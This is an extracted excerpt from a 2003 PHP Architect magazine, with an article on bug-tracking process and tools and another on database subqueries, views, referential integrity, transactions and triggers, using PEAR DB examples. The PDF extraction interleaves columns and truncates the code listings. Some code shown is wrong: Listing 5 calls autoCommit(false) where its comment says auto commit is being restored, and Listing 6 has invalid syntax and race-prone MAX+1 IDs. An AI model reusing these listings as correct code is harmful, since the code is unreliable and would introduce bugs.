that could be the topic of some future article, but this story is very important in establishing roles in our bug management process. Three roles are necessary for successful bug tracking: • Developer – person who actually writes code and fixes bugs • Tester (QA staff) – person who tests the code and writes bug reports. This person, as we will see later, also verifies that the certain bug is fixed • Project manager – person who assigns certain properties to bugs (like we are going to see in the next section) and assigns them to developers for fixing Bug Life Cycle
example, we could introduce the following components for tracking bugs in the project: • Presentation layer – all bugs that are related to the user interface such as HTML code, client side code (JavaScript), etc. • Business layer – malfunctions in business scripts and classes • Data access layer – bugs in Data Object classes, SQL queries, database wrappers and so on So when QA reports the bug, the component attribute should address a certain project subsystem in order to make it easier for the project manager to assign it later.
QA submit bug report
Owner
Developer fixes the bug
Project manager reviews the bug report and assigns it if necessary
QA verifies that bug is fixed
Bug gets closed
The bug life cycle would look like this: quality assurance person finds the bug and submits the bug report. Project manager reviews every bug report. If he finds that the bug is valid, he assigns some attributes to the bug and assigns it to the appropriate developer. The developer than fixes the bug and assigns it to QA for verification. QA repeats the tests on a requirement and the bug gets closed or reopened depending on the problem’s presence in the system. Anatomy of a bug Now is a good time to see what bug attributes we need in order to successfully track our bugs. Components
Components help us to partition and decouple the whole project implementation and also make it easier to find who is in charge of the particular code base. You can divide the project vertically by encapsulating all the code that is solving the same problem domain (business logic) into a component (financial classes, address book and so on) or horizontally by making components of the particular application layers. Or you could do both. There are no strict rules. You should find the scheme that best suits your needs. For
September 2003
●
PHP Architect
●
www.phparch.com
Owner is the person who is responsible for the bug in some of the bug cycles. It could be a developer that is responsible for fixing the bug or a QA team member that should verify that a bug is really fixed. This way it is much easier for the project manager to see what bugs are currently unassigned and assign them appropriately. Severity
Severity is another important bug attribute that tells us how serious our bug is. Some common values are: • Stopper – This kind of bug is stopping either the client in software usage or further development (e.g. crashes, bugs in database wrapper that disables the whole project from connecting to database, etc.) • Critical – serious bug that causes heavy program malfunctions (e.g. bug in a core library that causes other subsystems to act unstable) • Major – ‘major’ bugs make our software unreliable and can cause serious damage to us or our clients (e.g. bad data calculation in some cases that makes the data unreliable) • Normal – bugs that are not serious but are unpleasant to our clients (e.g. broken links in pages) • Minor – small bugs that are not crucial for core program execution, but should be fixed in order to make better quality of the product (e.g. bad label for a form field)
20
FEATURES
Introduction to Bug Management
• Enhancement – this is not a real bug, but a request for a new feature
bugs that are reported to these two versions because it is often a completely different code base.
Priority
Priority is the attribute that is assigned by the project manager and helps developers organize their tasks. It’s a common practice to have five priority levels and the bugs with higher priorities should be fixed first. Status
Status is directly connected with bug life cycle. It tells us in what stage of the bug cycle our bug currently resides. Some commonly used values are: • New – bug has been reported, but not yet reviewed • Assigned – bug has been reviewed by project manager and assigned to particular developer • Fixed – bug has been fixed by development team and has to be reviewed by QA • Verified (Closed) – QA has verified that the bug has been fixed • Reopened – QA have run tests against the bug that was marked as fixed, and some problems still remain, so it is sent back to development for further repair • Duplicated – this bug has already been reported • Won’t fix – these are so called “known bugs” that are not going to be fixed in this development cycle, mostly because of a great risk involved in fixing the bug or the required time for that job • Invalid – Problem that is reported is not a bug • Works for me – Problem that has been reported couldn’t be reproduced so it is put in the repository for later analysis Subject
Every bug report should have a subject attribute for easier browsing and querying. Milestone
The software development process is often divided into smaller iterations called milestones. We should keep track of the project milestone that a bug has been reported to and for which it has to be fixed. We can demonstrate this by imagining that we have delivered version 1.2 of the project to the client and continued to work on the next release (1.3). We need a way to separate
September 2003
●
PHP Architect
●
www.phparch.com
Comments
Comments are a very important and useful attribute of the bug. We should always allow our team members to enter an unlimited number of comments to the bug. Doing so will allow us to keep track of the communication and history of the bug. An initial comment for the bug could be a description of the problem that QA (or the client) has found in our software. Attachment
In some development organizations a very limited number of developers can commit changes to the code repository. In this case, the bug’s attachment attribute is used to add patches of code that fixes bugs. Attachment can also be used for many other purposes like screen shots, test cases and all material that helps to document the bug properly. The bug attributes described above are just a small subset of commonly used attributes in the project. You should, of course, adjust these attributes to the specifics of your individual project and process. Some additional attributes that can be useful to describe the bug are web browser (particularly interesting for web application development), URL of the page in which bug appears, operating system (for platform specific problems) and many, many more. Now that we know how to define our bugs, we should mention the process of collecting new feature requests for our project. This process is sometimes very closely related to the bug management process. When we were talking about the bug status attribute earlier, we said that special status could be introduced to separate the bug from a request for enhancement (RFE). Basically a feature request could have a very similar structure to the bug report and, since many bug tracking tools support this functionality, it is natural (to some point) to keep track of enhancement requests in the same repository as bugs. Bug reports OK, we have now discussed some basic information about the structure and life cycle of bugs. This information, however, is not enough for a successful bug tracking process. In order to make your process efficient, the QA department
21
FEATURES
Introduction to Bug Management
needs to supply useful bug reports to the development team. The more information developers have to work on, the sooner the bug will be traced and fixed. When submitting a bug report, there are a few things to keep in mind. First things first, a basic rule in any bug tracking process is to always try to repeat the bug before submitting the report. This is very important because some bugs occur only under very specific circumstances and environment settings. You must be sure that you know the specific environment variables and steps that lead to the malfunction that you are going to submit. Of course, some bugs are almost impossible to trace, but even then you should make it easier for the developer by pointing him to all of the things that failed to repeat it. That way we can save some time by not duplicating effort, and it gives certain clues to the development team about what could be the problem. Let’s take a look now at what makes a good report. We can start by showing one bad example and go through to see how to make it better. Let’s say that a report like this is submitted: When I inserted some customer data and clicked on the “Save changes” button, an error page was displayed.
When a developer gets a message like this, the only thing he knows is that some problem exists in the process of adding a new customer. He can’t begin fixing the problem without actually contacting the person that submitted this report because he hasn’t a clue where to start. So, the usual questions end up being asked: What error was displayed? What data did you submit? On what page did the error occur? In 99% of the cases, the submitter doesn’t remember all the details because it was a “century” ago, and we’re trapped in an infinite loop. But, if we use another approach and submit a report like this, everything could be very different: • Operating system: Windows XP • Browser: Mozilla 1.3 • URL: http://someproject.someurl/1/customer_add.php • Component: Address book • Version: 1.0 • Subject: Add a new customer • Brief description: submitting of a new customer with the regular data failed • Steps: Log in Click the link to the address book September 2003
●
PHP Architect
●
www.phparch.com
•
•
•
•
Click” Add new customer” button Enter the data (see “data” section) Click “Save changes” button Data: Name: Dejan Bosanac Email: [email protected] Title: Software developer All other fields: empty (default) Expected results: The data is submitted to the database and “view” page for the customer is displayed Actual results: Error page with a message “Error executing SQL query: phone_number field cannot be NULL” Conclusion: Problem is probably in bad JS validation for phone number field under Mozilla browser
With a report like this, the developer could spot the problem in a moment and fix it. Most of the fields (attributes) in this report have been described in the basic bug anatomy, so it is likely that your bug-tracking solution will support them. All the specific data of the problem should be put as the comment or the attachment to the bug. We can now summarize what a good report should consist of: 1. Brief description of the problem 2. Environment under which problem occurs 3. Steps needed to reproduce the problem 4. Specific inputs that caused the problem 5. pected and actual results 6. Summary of what the problem could be Of course, details of the each step depend on what the specific problem is. For example, if the bug is found during unit testing, input data should be the test case that caused the bug (you can attach the test class that caused the bug, if you want). Or, in another extreme case, if it is a visual (cosmetic) bug, all you have to submit is how to enter the specific page and what is wrong (environment-specific data is always useful). A general rule is that the more complex the problem is, the more information the developer is going to need. Bug tracking and development cycles For successful bug and request tracking there are a few more issues that you must keep in mind. The development cycle plays a key role in how the process is handled. It can be divided into three sections: • Development - implementation of the system functionality, resulting in huge
22
FEATURES
Introduction to Bug Management
changes to the codeset • Code freeze – software has entered beta testing phase and code is usually frozen • Release planning – preparations for the next project release are under way In order to have an efficient development process, we will look at how to use the bug-tracking system in each of these phases. In the development phase, good practice dictates that developers create test cases at the same time they write the code. A test case is code that is written to test certain functionality and to report the error if it is found. This way, we will actually have the confirmation that the software is doing the job for which it is meant. These test cases are normally grouped in a test suite that is executed regularly (preferably every night). This type of testing is called regression testing. We will not get into this in this article, but it is important to mention it because it affects the bug tracking process itself. Some authors say that in this stage of development we should not use a bug-tracking system as a repository for bug issues, as our test suite would keep this information for us. The would advise, though, to use a bug-tracking system for storing features that will be introduced later in the process. While this may true to some point, some errors cannot be detected with regression testing. Defects that are found during code reviews, user experience issues, and visual defects are just some of the bugs that we must handle outside of a test suite. So, my opinion is that in this phase we shouldn’t really submit duplicate reports to the system, but all the other issues that are reported during testing should be stored. If we don’t do this, we can easily forget about them until it is too late. Of course, if you don’t have automated testing introduced into your process, you should keep all the issues this way. Feature requests are always good to be stored in the system for later analysis. In the code freeze (beta testing) phase, the code is usually frozen and no immediate changes can be done. Now, we should keep track of all found malfunctions so that they can be fixed before the final release. It is also convenient to keep track of a user’s feature requests (usually beta testers are potential future users). At this point, we should introduce a request “grade”. In other words, we should keep track of how many requests we have for each feature, so we can easily separate the must-have features from the eccentric ones. When you are ready to start planning the next release, you could use the information stored in your tracking system. According to the request grade you can decide what features will become
September 2003
●
PHP Architect
●
www.phparch.com
part of the next release. One more thing is important in this stage: you must estimate the effort needed to implement certain features. For example, if some feature is a must-have feature and it requires minor code changes, then it should definitely be planned for the next release. In the case where the feature implementation requires huge code refactoring and involves great risk, you should think of delaying those features to some future release. When you have specifications for future releases, you should build the test cases for them and mark those requests as closed (remove them from the system). Bug tracking tools To start implementing organized bug management in your organization, you merely need concrete bug-tracking software. You could use a well-defined sheet in Excel-like software. You will soon see, however, that it would be much more efficient if you had just a little more. Many companies decide to build their own solutions, often seriously underestimating the effort for such a task. Many start with no clear idea of what they really want or need, and start coding a solution with minimal requirements. Soon after, they realize that maintenance and improvements to the solution are not cost effective by any means, and that costs of later porting to some commercial solution are much higher then it would have be in the start. Even if you have a small budget, it is not really hard to find a free solution in today’s open source software initiative. Many of these solutions will save you enormous time and manpower compared to building your own solution. That way, your developers can focus on building the project that needs the bug tracking process and not the particular tool itself. So, let’s start talking about what the defecttracking tool needs to provide you. How to choose the right tool for you? Before starting your search for a bug-tracking tool, you should have a clear vision of your bug tracking process so you can choose the tool that will have all the necessary requirements to meet your needs. Let’s divide the requirements into two basic groups: business requirements and technical requirements. Business requirements First of all, you should fit the tool into your current company profile and budget. There are various systems on the market with a wide price range, so you should start by positioning yourself into a group
23
FEATURES
Introduction to Bug Management
that you can currently afford. If your budget is small, don’t worry, there are many very nice opensource solutions. There are also companies that allow you to outsource this service to them for a reasonable amount. Second, you should know who the users of the bug management system will be, and if they have any specific needs. You will also need to be aware of how many users will be using the system, as well as their locations. The price of the bug management tool is often related to this information. You can divide users into two large groups. Internal users • QA staff will submit and query reports to find bugs that need to be verified • Developers will query reports to find assigned tasks • Project manager will query reports to find unassigned bugs, and also run metrics on the data External users • Customers • Clients • Beta Testers External users may like to submit enhancement requests or bugs, and see the progress and status of certain issues. In this case, you will probably be searching for a tool that can be exposed to the web for external (and, of course, internal) users. This leads us to the question of security. Does the potential tool allow the creation of groups of users, as well as the separation of their privileges on actions and data? We might want to only allow external users to query a small subset of all issues (for example, only those that they have entered), and allow them only to submit new reports, but not allow them to modify existing data. We could, of course, enable only some groups to submit reports, but I think that it would be better to allow all users to submit, as fewer bugs will be missed that way. We could also expect that only project management staff could change details such as severity and priority. All of these decisions are up to you. Usability of the system is another important parameter. Does the potential tool define the bug workflow that you need? Could it be configured? Does the bug submission form have all of the attributes that you need? Could it be configured? It is very important for the tool to be easy to use, as that will minimize the resistance to the tool by team members that may jeopardize the whole process. You should also consider whether the tool
September 2003
●
PHP Architect
●
www.phparch.com
supports various methods of notification when a bug status changes. Does the software send email, SMS messages, or have any other advanced techniques for notification. You may want the project manager to be immediately notified when a new critical bug report arrives, or you could enable your customers to be alerted when a certain bug is fixed. Administration concerns are the last issue that we will mention for the business requirements. We should know if we have someone who has skills that are needed for successful deployment, configuration, and maintenance of the system and how much time it is going to take aside from their regular duties. If this is a problem, then employing another person for this task must be considered. The administration of the bug management tool is usually the responsibility of project and network/database administrators. Technical requirements Technical requirements for defect tracking software are basically the same as for all other software products. • Reliability – software is stable and takes care of data consistency • Robustness – software behaves well in extreme conditions and large data volumes • Programmability – software has an application programming interface (API) through which it can be extended to your particular needs • Security – software gives needed security for the data and has no security flaws that can be easily exploited • Supportability – software vendor gives fair technical support for their product • Scalability – software is adaptable to your particular needs These are just basic technical concerns. You should also consider your current environment and skills. For example, does the product support database servers that you are comfortable with (MySQL, Sybase, Oracle, etc.)? Does the server code (in client/server and web-based solutions) suit your current development environment (Linux, Windows 2000, …), or will you need to prepare a new server for it? There are many factors to consider when choosing the perfect solution. Just one tip for the end, you should actually try every solution that seems to suit, since you won’t necessarily find the flaws just by reading the product specification.
24
FEATURES
Introduction to Bug Management
Some popular solutions As I said before many software packages are built for this specific need. We will mention two common ones - the further hunt is up to you. • Bugzilla (http://www.mozilla.org/projects/bugzilla/) – this product has its genesis in the opensource Mozilla web browser. It is written in Perl to replace an old bug tracking system used internally for Netscape Communications. It quickly became the defacto standard in the open source community, so you can see it in action on many projects on the web. Unix-like environments are natural for this software, and it is very well integrated with MySQL (but that’s the only database server that is currently supported). The source code comes under a mix of various licence policies that include the Netscape Public License (NPL), the Mozilla Public License (MPL), the GNU General Public License (GPL) and the GNU Lesser General Public License (LGPL). Some features worthy of note: – Integrated, product-based granular security schema – Inter-bug dependencies and dependency graphing – Advanced reporting capabilities – A robust, stable RDBMS back-end – Extensive configurability – A very well-understood and wellthought-out natural bug resolution protocol – Email, XML, console, and HTTP APIs – Available integration with automated software configuration management systems, including Perforce and CVS (through the Bugzilla email interface and checkin/checkout scripts) There are also some drawbacks that will be addressed in the future: – Reliance on only single database server (MySQL) – Rough user interface – Spartan email notification templates – Little report configurability – Some unsupported bug statuses – Little support for internationalisation – Dependence on some non-standard libraries
September 2003
●
PHP Architect
●
www.phparch.com
• Elementool (http://elementool.com) - It is possible these days to outsource your bug tracking to some other company. It is very convenient in situations when you don’t have, or can’t afford, more time and resources for the solution. All you need is a few minutes to set-up your account using your web browser, and you are ready to start. Also, this is an ideal solution for one-off projects because you can cancel your account at any time with no obligations. With this approach you don’t have any concerns regarding installing and updating your software, since you will always have the latest version ready for use. Their basic free package includes: – – – –
200 issue storage capacity Unlimited number of users Mail notifications Downloadable database for your own backup
For extra features like reports, history trail, customisable forms and so on, you must register for an advanced, commercial package.
These are just representatives of two approaches, you should really spend some more time to find a perfect solution for your needs. Closing word The aim of every professional software package is a satisfied customer. If you have an organized process for tracking bugs and feature requests in your project, you can be sure that less bugs will be detected by customers, and that the time cycle needed to fix those bugs (and track down new requirements) will be noticeably shorter. There are many tools available on the market that could help you organize your defects and requirements, but, before you start tracking them, be sure that you know what you need. Bug tracking is closely related to quality assurance issues and team organization, so it is important to start from there. Just try it; it’s easier than it sounds. About the Author
?>
Dejan Bosanac works as a fulltime software developer for DNS Europe Ltd (http://www.dnseurope.net) on the Billing software system for ISP's. In his spare time he also serves as a Lead Engineer at Noumenaut Software(http://www.noumenaut.com) on the online journaling project. He holds a Bachelor degree in Computer Science and currently is on the master studies in the same field.
Click HERE To Discuss This Article http://forums.phparch.com/45 25
Advanced Database Features Exposed
F E A T U R E
by Davor Pleskina
Databases have ceased to be a mystery. Designing and setting up databases and database-driven applications is no longer a terribly complicated task handled successfully only by specialists and technicians. Behind almost every site that consists of more than a product brochure is some kind of database from which information is retrieved and presented. lthough most web applications do not require highly advanced database servers, some of these servers provide more advanced features – such as subqueries, referential integrity, transaction handling, and support for stored procedures and triggers – which can make a developer’s life far easier. We will examine these aforementioned features from a higher level, giving examples of their use and usefulness, as well as showing how some of them can be simulated at a low level within PHP. Perhaps you have heard of some of these features, and maybe even used some of them. This article’s intent is to lower the bar for the uninitiated, and hopefully show you a right tool or two for the job. I mean, there is no sense trying to develop a semi-usable transaction handling system in PHP (which would be a difficult task indeed), when you could just use a database with transaction support built-in, right? As much as possible, I’ll try to avoid database specific code. To avoid presenting database-specific PHP examples, I am going to use the PEAR DB class. PEAR (the PHP Extension and Application Repository) is a free online PHP software repository, and can be found at http://pear.php.net. PEAR is usually installed automatically when you install PHP using common install packages. In all examples, we will assume that we are already connected to a database server, and that we already have a database connection handle which we are going to call $dbh. There will also be no error messages
A
September 2003
●
PHP Architect
●
www.phparch.com
specific to any RDBMS. As far as requisite knowledge for the article, we’ll assume a basic understanding of SQL, and go from there. Some Data We are going to need some real world tables and relationships to simulate situations in which our aforementioned advanced database features become necessary. Suppose we have two small tables, one containing data about our customers, and the other containing their addresses (we might expect a customer to have more than one address). These tables are going to contain a very small number of columns, and we will avoid specifying specific data types. Here are the table structures we’ll work with: CUSTOMER table: CUSTOMER_ID FIRST_NAME LAST_NAME GENDER ADDITIONAL_INFO LAST_CHANGE
ADDRESS table: ADDRESS_ID CUSTOMER_ID STREET CITY POSTAL_CODE STATE COUNTRY LAST_CHANGE
DELETE FROM CUSTOMER WHERE NOT EXISTS (SELECT CUSTOMER_ID FROM ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID)
It may be apparent that CUSTOMER_ID is going to be our customer’s unique identification number, as well as that table’s primary key. Other information that we will store about the customer includes first and last name, gender, and any desired additional info. The last column in the CUSTOMER table represents the date of the last change made to a specific customer’s information. The ADDRESS table can hold more than one address for a single customer. The unique identifier and primary key for each address is stored in a column named ADDRESS_ID. This table must also contain a reference to the appropriate customer, and this is found in the CUSTOMER_ID column. Specific address data is also stored, including the street, city, postal code and country columns, while the last column again holds information about when the specific record last changed. Subqueries You can think of subqueries (or sub-SELECTs) as SELECTs within other SELECTs. A simple example could look like:
SELECT something FROM table_1 WHERE something IN ( SELECT something_else FROM table_2 WHERE something_else LIKE ‘more conditions’ )...
Let’s look at a demonstration of the importance and use of subqueries. Consider that from time to time we want to remove customers who do not have any addresses in our database. To do that without subqueries would require a number of steps. We would need to browse the CUSTOMER table record-by-record checking for matching records in the ADDRESS table, deleting the customers with none. An example of doing this with PHP is shown in Listing 1. Using a subquery, we could do all of this in one step with the following statement: September 2003
●
PHP Architect
●
www.phparch.com
As you can see, the subquery will perform a small join on CUSTOMER and ADDRESS. If the subquery doesn’t return a row for a particular customer, it means that there are no addresses in the ADDRESS table, and the customer can be deleted. What a job done in only one statement! The statement could also have been written using IN operator like Listing 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
query ($query_customers); // OK, process each row in result set while ($row_customer = $result_customers->fetchRow()) {
24 25
26 27 28 29 30 31 32 33
34 35 36 } 37 38 } 39 40 ?>
// Get customer ID $customer_id = $row_customer [‘CUSTOMER_ID’] // Count addresses $result = $dbh->query ($query_check_address. ”’$customer_id’”); $row = $result->fetchRow()); // Get number of addresses $count = $row[‘CNT_ADDRESS’]; if ($count < 1) { // No addresses, delete the customer $dbh->query ($query_delete_customer. ”’$customer_id’”); }
28
FEATURES
Advanced Database Features Exposed
DELETE FROM CUSTOMER WHERE CUSTOMER_ID NOT IN (SELECT CUSTOMER_ID FROM ADDRESS)
This is a different approach to doing the same job, but returns and checks more data for each customer, which is not recommended when the tables involved store a large amount of data. In such cases, EXISTS is a more suitable operator.. If your applications use very complex SQL statements to retrieve data, you can also simplify them, and avoid joining too many related tables, by using subqueries to retrieve single data column from related tables. Note the following two statements, which both return the same result: SELECT CUSTOMER.CUSTOMER_ID COUNT (ADDRESS.*) AS NO_OF_ADDRESSES FROM CUSTOMER, ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID GROUP BY CUSTOMER.CUSTOMER_ID SELECT CUSTOMER.CUSTOMER_ID, (SELECT COUNT (*) FROM ADDRESS WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID) AS NO_OF_ADDRESSES FROM CUSTOMER
In both cases, the customer’s ID and count of related addresses is returned; however, in the first statement we had to group data using the GROUP BY clause, which is in most cases a slow operation on large tables. In the second statement, we executed small and quick subquery (it is quick because it retrieves only related data from the ADDRESS table for each customer and counts it using the table’s primary keys) thereby avoiding joining and grouping. Although, on first sight, the second statement would now look more complex than the first one, think what would it look like if we had to join and group more than two tables with many fields – there would appear many field names in the WHERE and GROUP BY clauses, and the SELECT list would look much more complicated. Field name conflicts could also appear, and we would be forced to assign the table name to each field which appears more than once. We should also mention that all field names in a subquery are local to that statement, and we do not need to worry about conflicts with field names in the main statement.
September 2003
●
PHP Architect
●
www.phparch.com
If your statements are complex, the use of subqueries can often help with their simplification. This is not to say that there are not good reasons to use each of these other methods. Depending on the SQL statement’s complexity, the number of joined tables, and the amount of data processed, each method will act differently. Views A view is a virtual table which does not physically exist. It is defined as a query on one or more tables and stored in the database definition as an SQL statement. You can do any kind of SELECT from a view, and use it in any SQL statement just as you would any physical table. Views can sometimes be updated and deleted from, but whether a view is updateable or not depends on the complexity of its SQL definition and join conditions. Views can be created, altered, or dropped just like regular tables. Let’s return to our problem of counting a customer’s addresses from table ADDRESS. Instead of doing a subquery or creating a temporary table to hold the counts of all addresses for each customer we could simply create a view like this one: CREATE VIEW CUSTOMER_ADDRESS_COUNT AS SELECT CUSTOMER_ID, COUNT (*) AS NO_OF_ADDRESSES FROM ADDRESS GROUP BY CUSTOMER_ID
We have defined a virtual table named CUSTOMER_ADDRESS_COUNT, which contains one row for each customer with his addresses counted in field NO_OF_ADDRESSES. Now we can select data from the view by issuing a statement like SELECT * FROM CUSTOMER_ADDRESSES_COUNT
We will get a set of rows containing CUSTOMER_ID and NO_OF_ADDRESSES for each customer, just like we did with the previous SQL statements that used subqueries or joins. Having this view defined, we could now repeat our address count check from Listing 1, avoiding the $query_check_address SQL statement. Better than that, our main query can be changed so that it returns only customers with no addresses: SELECT * FROM CUSTOMER, CUSTOMER_ADDRESS_COUNT WHERE CUSTOMER.CUSTOMER_ID = CUSTOMER_ADDRESS_COUNT.CUSTOMER_ID AND NO_OF_ADDRESSES = 0
This statement immediately returns only customers without addresses, and we can delete them easily. Views can be (and are) used to do much more complex things than this. In fact, their main purpose is simplification of SQL statements. Views can also be used to restrict database access, often hiding the structure and full contents of the physical tables from whoever selects data. Referential Integrity As explained in pretty much any relational database theory book, referential integrity prevents applications from creating inconsistent data entries in a database. It is usually represented by some kind of relationship between two database objects (tables), or simply with some rules that determine which data can be entered into existing database objects. As a simple example, referential integrity could prevent entering data into table X if some corresponding data does not exist in table Y. Likewise, it could prevent applications from deleting any data in table X that has corresponding data in table Y. Many relational database systems support different modes of referential integrity, but the most common method is the creation of foreign keys. If table X has a foreign key that points to a field in table Y, a referential integrity system might restrict adding records to Table X that don’t refer to a value in that table Y field. It might also prevent deletion or single-side change of the linked data in table Y, or take care that all deleted or modified data in table Y is likewise deleted and modified in all linked tables (table X). While the former method is preventative or restrictive, the latter method cascades changes from table Y to table X, and is thus referred to as “cascading delete” and “cascading update”. In our case, we should take care that users handling our application do not delete a customer from the CUSTOMER table if there are addresses stored in ADDRESS table that belong to him. Deleting the customer data (as in Listing 2) would leave his addresses orphaned, and there is the possibly that they could be unwittingly re-attached at a later time to some newly entered customer (if the deleted customer’s ID was re-used when a new customer was added). With referential integrity, we can easily establish a relation between the CUSTOMER and ADDRESS tables by creating a FOREIGN KEY in table ADDRESS which points to the customer’s ID in CUSTOMER. We should give the key a name, so let’s make it FK_ADDRESS_CUSTOMER_ID, simply showing that it relates the ADDRESS table to the
30
FEATURES
Advanced Database Features Exposed
CUSTOMER table through column CUSTOMER_ID. Our foreign key will do several things for us: • it will prevent us from entering a CUSTOMER_ID into the ADDRESS table that does not yet exist in the CUSTOMER table. • it will prevent us from deleting a customer whose CUSTOMER_ID is referenced from addresses stored in the ADDRESS table. • if defined with ON … CASCADE clause, it would ensure that deleting a customer would delete all his addresses, or that updating his CUSTOMER_ID in the CUSTOMER table would update it in all referring records in the ADDRESS table. Our foreign key definition should normally be specified in the ADDRESS table creation code, and might look like: FOREIGN KEY FK_ADDRESS_CUSTOMER_ID (CUSTOMER_ID) REFERENCES CUSTOMER (CUSTOMER_ID) The above statement creates a restrictive foreign key. To add support for cascading, use: FOREIGN KEY FK_ADDRESS_CUSTOMER_ID (CUSTOMER_ID) REFERENCES CUSTOMER (CUSTOMER_ID) ON UPDATE CASCADE ON DELETE CASCADE
Now imagine Listing 2 running on linked tables. The referential integrity engine would either physically prevent the deletion of customer records that have addresses (restrict), or delete the addresses as well (cascade). If you are using a RDBMS that does not support referential integrity, you can still simulate it fairly successfully. In this simple case it might be an extended version of our function from Listing 2, shown in Listing 3. Although writing code to extend this function does not appear to be too much hard work, it is obvious that simulating just a simple restrictive referential integrity engine can mean writing some amount of extra code. Simulating a cascading delete is a fairly simple change (shown in Listing 4):
There are some performance issues to consider when using cascading updates. In the case that your database server contains a large amount of related data, the change or deletion of some master records could force the database server to perform large, time-consuming update operations. In the worst case scenario, this could result in exceptional load on the server, as well as script execution timeouts. The proper use of referential integrity can help to reduce the amount of sanity checking code necessary and the number of errors introduced, as well as helping to increase the amount of sleep you get at night. Transactions OK, we did nice job programming an integritychecking routine which checks for existing addresses and either prevents us from deleting the customers to which they belong, or deletes the addresses as well. Consider, though, that your application communicates with the remote database server through some wired link. Imagine that just between deleting data from the ADDRESS table and the CUSTOMER table, someone cuts the wire? Of course, this is not a huge problem in our simple case, but there are complex situations where this would be a big problem.
31
FEATURES
Advanced Database Features Exposed
Listing 5 1 autoCommit(false); 17 18 $result = $dbh->query ($query_update_address); 19 if ($dbh->isError($result)) 20 { 21 // display an error message and exit 22 echo “Error updating addresses.”; 23 } 24 else 25 { 26 $result = $dbh->query ($query_update_customer); 27 if ($dbh->isError($result)) 28 { 29 // display an error message and exit 30 echo “Error updating customer.”; 31 } 32 else 33 { 34 // Indicate that all intended has been done 35 $success = 1; 36 } 37 } 38 39 if ($success == 1) 40 { 41 // If no error happened, we commit the work 42 $dbh->commit(); 43 } 44 else 45 { 46 // Otherwise, we can undo a complete task 47 // leaving the data in the state just as before we started 48 $dbh->rollback(); 49 } 50 51 // You might want to set auto commit option 52 // back to True for other processes that do not use transactions 53 $dbh->autoCommit(false); 54 55 return $success; 56 57 } 58 59 ?>
September 2003
●
PHP Architect
●
www.phparch.com
Besides, users would be confused if addresses were deleted while customer data stays. How can we get around this? By using transactions. Transactions are, roughly explained, closed processes that are invisible to concurrent database users. A transaction remains invisible to other users until such time as it is committed. If a transaction is rolled back, or discarded, other users will never know it even happened in the first place. This means that when we start a transaction, whatever we do with data in the database will be invisible to other users. If we send a COMMIT statement, all of our work will be actually written to the database and other users will be able to see the altered values. If we issue a ROLLBACK statement, no changes will be written at all, leaving the data in the same state as we started with. A transaction rollback, depending on the database server’s settings, also happens when the connection to the server is lost or broken, or if an error condition was raised while we were working. That is awesome data consistency protection! As we mentioned, with the previous data deletion example it was not possible to leave customers without address data if our script broke between the two DELETE statements. What if, for some particular reason, we want to change our customer’s ID? To keep data in the two tables related to each other, the changed ID must also be updated in all customer address records. If the connection breaks in the middle of the changes, our addresses could be left without a customer, or our customer could be left without addresses. By invoking a transaction before we start updating data, and committing it after updates have completed, we can ensure that no data will be left in an inconsistent state. An example is given in Listing 5. Let’s have a look at it. After we set up the queries to run in order to change our customer ID from $old_customer_id to $new_customer_id, we also set up an error indicator. The $success variable will tell us if all has been completed correctly at the end of our function. Notice one special function call, $dbh->autoCommit(false). This function tells the RDBMS which serves our data that we want to turn off the ‘auto commit’ feature. ‘Auto commit’ is supported by many database server engines, and it means simply that the transaction started implicitly by each query will automatically be committed when the query is fin-
32
FEATURES
Advanced Database Features Exposed
ished. Most RDBMS’s have this turned on by default, but to prevent storing incomplete changes we must turn this feature off. We do not want to store anything until all changes are complete. In the PEAR DB class we can turn off ‘auto commit’ programmatically by calling the autoCommit() method. Calling this method actually means that the first and subsequent changes to our data will be done within a transaction, and will not be written or discarded until we issue a commit or a rollback. At the end of our function in Listing 5, we can check if any errors happened while updating the data. If not, we can call the commit() method, which will write out all of our changes and close the transaction. If an error did ocur, we can simply call the rollback() method, which will discard all of our changes and close
the transaction. A little better error handling around the commit() calls could be done here. Even calling the commit() method could cause an error, in which case no data would be written. It is important to handle transaction completion properly because leaving open transactions (especially in conjunction with table locks) could cause locked data and prevent other users from accessing the database!
“Although most web applications do not require highly advanced database servers, some of these servers provide more advanced features.”
Listing 6 1 query($query_last_id); 23 24 // Now incease it’s value 25 $new_id = $result(‘LAST_ID’) + 1; 26 27 // Let’s insert the data 28 $result = $dbh->query ($query_insert_customer); 29 if ($dbh->isError($result)) 30 { 31 // display an error message and exit 32 echo “Error adding customer.”; 33 return 0; 34 } 35 else return 1; 36 37 } 38 39 ?>
September 2003
●
PHP Architect
●
www.phparch.com
It should be noted that, although we used the PEAR methods above, transactions can usually be set up manually with SQL statements. The exact syntax varies from system to system. We should also mention that transactions could be simulated by PHP. Any simulation of this feature would be hard-pressed to be robust enough for real world use, and would be a very complex piece of code, but it is possible to do. The most common way is to prepare all edits Listing 7 1 PROCEDURE NEW_CUSTOMER (FIRST_NAME, LAST_NAME, ADDITIONAL_INFO, GENDER) 2 BEGIN 3 GET_NEW_CUSTOMER_ID; — an SQL code or function to get new customer ID 4 INSERT_NEW_CUSTOMER; — an SQL code to insert data into table CUSTOMER 5 END
Listing 8 1 2 3 4 5 6 7 8
CREATE TRIGGER before_new_customer BEFORE INSERT ON customer_id REFERENCING NEW AS new_customer_row FOR EACH ROW BEGIN new_customer_row.CUSTOMER_ID = (SELECT MAX(CUSTOMER_ID)+1 FROM CUSTOMER); END
33
FEATURES
Advanced Database Features Exposed
